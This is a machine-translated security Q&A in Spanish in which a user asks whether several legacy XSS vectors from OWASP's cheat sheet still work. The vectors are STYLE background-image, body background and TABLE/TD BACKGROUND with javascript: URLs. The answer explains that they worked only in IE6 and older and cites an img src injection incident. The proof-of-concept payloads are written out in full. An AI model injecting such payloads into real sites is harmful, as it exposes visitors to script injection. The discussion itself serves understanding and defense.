XSS con imagen de fondo del atributo de estilo

Navega tus respuestas
1

He intentado verificar algunos vectores de OWASP XSS CheatSheet que explota atributos de estilo

Etiqueta de ESTILO usando imagen de fondo 

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE tag using background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">
TD
Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

Pero ninguno de ellos parece estar funcionando en los últimos navegadores: IE10, IE11, Chrome, Firefox, Safari.

¿Son vectores XSS válidos?

    
pregunta Prasad K 25.03.2014 - 06:22
fuente

1 respuesta

5

OWASP's XSS Filtrar por ejemplo: JASP.P. navegadores antiguos

  

Pruebas en desuso (funciona en IE 6 y navegadores más antiguos)

     

Estas son las pruebas que solo se ha confirmado que funcionan en IE 6   a menos que se especifique lo contrario y no funcionan en ningún navegador moderno como   del 12 de marzo de 2014.

No obstante, recuerde que no todos los usuarios utilizan navegadores actualizados.

Un ejemplo es el ataque <img src="javascript:alert('xss')" /> . Nunca pensé que me preocuparía hasta que uno de nuestros clientes informó que cuando intentaba acceder a la página de un pedido en su sistema de inventario, lo redirigían a un sitio web pornográfico. Encontré la fila ofensiva en la base de datos, pero nunca pude reproducir la redirección hasta que supe que usaba IE6.

    
respondido por el Adi 25.03.2014 - 07:16
fuente

Lea otras preguntas en las etiquetas

¿Cómo eliminar un archivo exe que probablemente sea malware? Gmail, Google y privacidad